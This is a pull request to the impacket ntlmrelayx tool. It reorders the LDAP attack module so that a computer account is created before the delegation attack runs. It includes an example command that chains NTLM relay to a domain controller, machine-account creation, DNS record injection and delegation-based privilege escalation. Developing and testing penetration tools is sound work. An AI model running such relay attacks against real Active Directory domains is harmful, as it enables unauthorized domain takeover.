### PR TITLE
Add Computer Before Delegation

### DIFF
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1105,11 +1105,6 @@ class LDAPAttack(ProtocolAttack):
             if dns_name_ok and dns_ipaddr_ok:
                 self.addDnsRecord(name, ipaddr)
 
-        # Perform the Delegate attack if it is enabled and we relayed a computer account
-        if self.config.delegateaccess and self.username[-1] == '$':
-            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
-            return
-
         # Add a new computer if that is requested
         # privileges required are not yet enumerated, neither is ms-ds-MachineAccountQuota
         if self.config.addcomputer is not None:
@@ -1124,6 +1119,11 @@ class LDAPAttack(ProtocolAttack):
             self.addComputer(computerscontainer, domainDumper)
             return
 
+        # Perform the Delegate attack if it is enabled and we relayed a computer account
+        if self.config.delegateaccess and self.username[-1] == '$':
+            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
+            return
+        
         # Perform the Shadow Credentials attack if it is enabled
         if self.config.IsShadowCredentialsAttack:
             self.shadowCredentialsAttack(domainDumper)


### PR DESCRIPTION
Reorder attack components so a computer account is created if specified before the delegate attack is attempted.

This allows users to create a relay and specify to both `--add-computer` and `--delegate-access --escalate-user` to create a computer account and delegate access to the account in a single relay. Currently, if this is attempted, the delegation attack is performed first and it results in an error that the computer to delegate to does not exist. 

What I'd like to be able to do is add a computer, escalate access, and setup a DNS record all in a single relay. For example
```bash
impacket-ntlmrelayx -t ldaps://<DC.DOMAIN.TLD> --add-computer '<COMPUTER NAME>$' '<PASSWORD>' --add-dns-record '<COMPUTER NAME>' '<COMPUTER IP>' --delegate-access --escalate-user '<COMPUTER NAME>$'
```